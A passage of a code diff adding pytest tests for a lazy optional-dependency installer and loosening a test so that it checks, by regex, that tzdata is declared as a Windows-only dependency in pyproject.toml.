+        monkeypatch.setattr(
+            ld, "_venv_pip_install",
+            lambda specs, **kw: ld._InstallResult(True, "ok", ""),
+        )
+        with pytest.raises(ld.FeatureUnavailable, match="still not importable"):
+            ld.ensure("test.cache", prompt=False)
+
+
+# ---------------------------------------------------------------------------
+# is_available
+# ---------------------------------------------------------------------------
+
+
+class TestIsAvailable:
+    def test_unknown_feature_returns_false(self):
+        assert ld.is_available("not.a.thing") is False
+
+    def test_satisfied_returns_true(self, monkeypatch):
+        monkeypatch.setitem(ld.LAZY_DEPS, "test.avail", ("zzzfake>=1",))
+        monkeypatch.setattr(ld, "_is_satisfied", lambda spec: True)
+        assert ld.is_available("test.avail") is True
+
+    def test_missing_returns_false(self, monkeypatch):
+        monkeypatch.setitem(ld.LAZY_DEPS, "test.miss", ("zzzfake>=1",))
+        monkeypatch.setattr(ld, "_is_satisfied", lambda spec: False)
+        assert ld.is_available("test.miss") is False
--- a/tests/tools/test_windows_native_support.py
+++ b/tests/tools/test_windows_native_support.py
@@ -420,12 +420,21 @@ class TestTzdataDependencyDeclared:
        root = Path(__file__).resolve().parents[2]
        source = (root / "pyproject.toml").read_text(encoding="utf-8")
        # The dependency line should be conditional on sys_platform == 'win32'
-        # and should NOT be in the core dependencies for Linux/macOS.
-        assert (
-            'tzdata>=2023.3; sys_platform == \'win32\'' in source
-            or "tzdata>=2023.3; sys_platform == 'win32'" in source
-            or 'tzdata>=2023.3; sys_platform == "win32"' in source
-        ), "tzdata must be a Windows-only dep in pyproject.toml dependencies"
+        # and should NOT be in the core dependencies for Linux/macOS. We do
+        # not care about the exact pinned version (which is bumped over time)
+        # — only that tzdata is declared with a win32 marker. This is an
+        # invariant check, not a snapshot test.
+        import re
+        # Match `"tzdata` … `; sys_platform == 'win32'"` allowing any version
+        # specifier in between (==X.Y.Z, >=X.Y.Z,<W, etc.) and either quote
+        # style, both around the TOML string and on the marker.
+        pattern = re.compile(
+            r'''["']tzdata[^"']*;\s*sys_platform\s*==\s*["']win32["']\s*["']'''
+        )
+        assert pattern.search(source), (
+            "tzdata must be a Windows-only dep in pyproject.toml dependencies "
+            "(declared with a `; sys_platform == 'win32'` marker)"
+        )


 # ---------------------------------------------------------------------------